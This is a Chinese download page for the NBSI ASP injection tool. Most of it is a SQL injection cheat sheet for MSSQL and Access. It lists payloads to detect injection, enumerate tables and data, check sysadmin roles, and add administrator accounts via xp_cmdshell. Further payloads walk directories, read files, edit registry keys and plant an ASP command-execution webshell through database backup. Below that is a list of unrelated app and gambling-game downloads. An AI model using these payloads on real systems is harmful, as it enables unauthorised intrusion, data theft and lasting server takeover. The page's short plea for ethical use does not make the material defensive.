大小:976KB更新:2019-07-26 18:21
类别:杂类工具系统:Win7, WinAll
包名:
nbsi(asp注入漏洞检测工具)能够为站长们提供更安全的漏洞检测功能,旨在保护网站的安全,可以对网站进行扫描和分析,特别是在对sql server注入检测这个方面十分的有用,如果有需要的快来试用吧!
1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.注入参数是字符
'and [查询条件] and ''='
5.搜索时没过滤参数的
'and [查询条件] and '%25'='
6.猜数据库
;and (Select Count(*) from [数据库名])>0
7.猜字段
;and (Select Count(字段名) from 数据库名)>0
8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell 'net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add'
;--
;exec master.dbo.xp_cmdshell 'net user username
password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup
administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'CommonFilesDir' 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:\l.asp';
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';
请求的时候,像这样子用:
http://ip/l.asp?c=dir
nbsi(asp注入漏洞检测工具)功能非常强大,希望同学们用于正途,别去做一些偷鸡摸狗的令人可耻的事情,由VB语言编写的网站漏洞检测工具的名称,ASP注入漏洞检测工具,特别在SQL Server注入检测方面有极高的准确率。喜欢就赶紧来试用吧!
解压密码:www.downyi.com
显示全部
应用宝电脑版 杂类工具65.4MBV5.8.3
下载超级加密3000最新版本 杂类工具8.9MBv12.53
下载数独计算器最新版免费 杂类工具0.01MBv0.10.2
下载熊猫变声器免费版 杂类工具5.96MBv1.0.6
下载护眼宝客户端 杂类工具3.78MBv3.1
下载嗨格式压缩大师免费版 杂类工具1.91MBv1.1.38
下载Abookmark asnote最新版 杂类工具0.612MBV0.16.0
下载Abookmark asnote书签管理软件 杂类工具0.612MBV0.16.0
下载滴答清单免登录 杂类工具6.08MV5.0.1.0
下载掌上看家免费最新版本 杂类工具6.76MBv5.2.6
下载护眼宝精简版3.7去广告 杂类工具3.78MBv3.1
下载365智能优化电脑版 杂类工具19.2MBv6.6.3.633
下载1Password电脑版 杂类工具8.4 MBv7.4.763
下载易宝箱电脑版 杂类工具2.32MBV3.1.1.2
下载fiddler抓包工具 杂类工具6.34MBv5.0.20204.45441
下载KeyShot最新版本 杂类工具0MBv10.0.198
下载真人捕鱼比赛老版本 趣味休闲56.12MBv8.0.19.7.0 安卓版
下载捕鱼大决战游戏 趣味休闲56.12MBv122.7.238 安卓版
下载大富豪街机捕鱼小米手游 趣味休闲56.12MBv3.2.3.0 安卓版
下载百灵棋牌 趣味休闲55.35MB
下载捕鱼欢乐颂小米客户端 趣味休闲56.12MBv1.0.39 安卓最新版
下载麦游捕鱼赢现金红包最新版 趣味休闲56.12MBv1.1.1 安卓版
下载海王捕鱼话费版 趣味休闲56.12MBv1.2.43354 安卓版
下载捕鱼竞技场抖音游戏 趣味休闲56.12MBv1.0.0 安卓最新版
下载波克城市棋牌官网 趣味休闲49.83MB
下载维吾尔语斗地主安装 趣味休闲49.45MB
下载清雨剑2020 生活服务33.25MB
下载体彩排列5综合版彩宝贝 生活服务33.25MB
下载3d最新天中图库 生活服务19.08MB
下载七星彩版加急版一夜谈 生活服务33.25MB
下载七星彩开奖时间 生活服务33.25MB
下载